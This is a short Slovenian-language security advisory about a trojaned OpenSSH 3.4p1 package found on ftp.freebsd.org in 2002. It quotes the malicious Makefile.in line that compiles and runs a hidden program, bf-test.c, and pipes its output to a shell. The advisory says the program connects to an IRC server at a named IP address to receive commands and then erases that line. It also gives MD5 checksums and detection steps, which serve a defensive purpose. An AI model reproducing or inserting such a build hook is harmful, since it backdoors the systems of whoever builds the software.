OpenSSH verzija 3.4p1 za operacijski sistem OpenBSD lahko vsebuje dodatni program, ki ogrozi varnost sistema, na katerem se je program prevedel.
Opis
OpenSSH je implementacija SSH protokola, ki omogoča šifriranje podatkov med računalniki in se uporablja v glavnem za interaktivno delo na oddaljenem računalniku, kopiranje datotek in vzpostavitev šifriranih tunelov za poljubne servise.
Kopija OpenSSH paketa, ki se je znašla 31.7.2002 na ftp.freebsd.org vsebuje spremembe v datoteki Makefile.in, ki prevedejo in zaženejo dodaten program:
@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
Program bf-test.c se poveže na IP naslov 203.62.158.32, vrata 6667 (irc) in od tam sprejema ukaze, ki se na sistemu izvajajo pod pravicami uporabnika, ki je OpenSSH paket prevajal.
Po zagonu bf-test.out se zgornja vrstica v Makefile.in izbrise!
Rešitve
<dl><dt>Preverite MD5 podpis openssh-3.4p1.tar.gz </dt><dd>
| Pravilen podpis | 459c1d0262e939d6432f193c7a4ba8a8 |
| Podpis trojanske verzije | 3ac9bc346d736b4a51d676faa2a08a57 |
</dd><dt>Preverite, ali OpenSSH 3.4p1 paket vsebuje bf-test.c</dt><dd>
Pred prevajanjem preverite, ali datoteka Makefile.in vsebuje zgoraj navedeno vrstico, ki prevede bf-test.c. Če ste paket že prevedli in je paket vseboval trojanskega konja, je ta izbrisal zgornjo vrstico iz Makefile.in
</dd></dl>